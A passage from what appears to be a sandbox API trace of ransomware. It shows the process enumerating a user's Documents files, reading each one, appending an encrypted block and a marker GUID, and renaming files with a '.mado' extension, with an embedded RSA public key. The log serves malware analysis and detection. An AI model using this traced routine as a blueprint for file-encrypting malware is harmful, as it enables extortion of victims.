returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bc0 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b90 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b86ea8 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f0a8 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67190 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.377] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10691, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.377] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.377] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.378] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.378] CloseHandle (hObject=0x63c) returned 1 [0206.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x3b7b950 [0206.379] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\V7cX B.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\v7cx b.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\V7cX B.ots.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\v7cx b.ots.mado")) returned 1 [0206.380] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b176e30, ftCreationTime.dwHighDateTime=0x1d5d976, ftLastAccessTime.dwLowDateTime=0xb7dcd9d0, ftLastAccessTime.dwHighDateTime=0x1d5e63f, ftLastWriteTime.dwLowDateTime=0xb7dcd9d0, ftLastWriteTime.dwHighDateTime=0x1d5e63f, nFileSizeHigh=0x0, nFileSizeLow=0x7430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yGd6-EVG.ppt", cAlternateFileName="")) returned 1 [0206.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11e) returned 0x336fe98 [0206.381] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\yGd6-EVG.ppt") returned=".ppt" [0206.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\yGd6-EVG.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\ygd6-evg.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.382] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=29744) returned 1 [0206.382] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.384] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x740a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.384] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.385] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x7430, lpOverlapped=0x0) returned 1 [0206.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.386] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.386] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.387] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.387] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.387] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.387] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.387] GetLastError () returned 0x0 [0206.387] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.387] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.387] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.387] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.387] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.387] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.388] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7430, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.388] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.388] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.388] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.388] CloseHandle (hObject=0x63c) returned 1 [0206.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x3b7b950 [0206.390] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\yGd6-EVG.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\ygd6-evg.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\yGd6-EVG.ppt.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\ygd6-evg.ppt.mado")) returned 1 [0206.391] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713064a0, ftCreationTime.dwHighDateTime=0x1d5dd40, ftLastAccessTime.dwLowDateTime=0xc1f07fd0, ftLastAccessTime.dwHighDateTime=0x1d5da5f, ftLastWriteTime.dwLowDateTime=0xc1f07fd0, ftLastWriteTime.dwHighDateTime=0x1d5da5f, nFileSizeHigh=0x0, nFileSizeLow=0x1781a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZmL6ap0CI6Yah3dGYPyU.ppt", cAlternateFileName="ZML6AP~1.PPT")) returned 1 [0206.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11e) returned 0x336fe98 [0206.391] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\ZmL6ap0CI6Yah3dGYPyU.ppt") returned=".ppt" [0206.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\ZmL6ap0CI6Yah3dGYPyU.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\zml6ap0ci6yah3dgypyu.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.393] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=96282) returned 1 [0206.393] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.396] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x177f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.396] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.397] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1781a, lpOverlapped=0x0) returned 1 [0206.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.398] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.399] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.399] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.399] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.399] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.399] GetLastError () returned 0x0 [0206.399] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.399] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.400] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.400] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.400] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.400] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.401] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1781a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.401] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.401] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.401] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.401] CloseHandle (hObject=0x63c) returned 1 [0206.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0206.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3b7b950 [0206.402] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\ZmL6ap0CI6Yah3dGYPyU.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\zml6ap0ci6yah3dgypyu.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\ZmL6ap0CI6Yah3dGYPyU.ppt.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\zml6ap0ci6yah3dgypyu.ppt.mado")) returned 1 [0206.404] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713064a0, ftCreationTime.dwHighDateTime=0x1d5dd40, ftLastAccessTime.dwLowDateTime=0xc1f07fd0, ftLastAccessTime.dwHighDateTime=0x1d5da5f, ftLastWriteTime.dwLowDateTime=0xc1f07fd0, ftLastWriteTime.dwHighDateTime=0x1d5da5f, nFileSizeHigh=0x0, nFileSizeLow=0x1781a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZmL6ap0CI6Yah3dGYPyU.ppt", cAlternateFileName="ZML6AP~1.PPT")) returned 0 [0206.404] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.404] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77d00 [0206.404] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 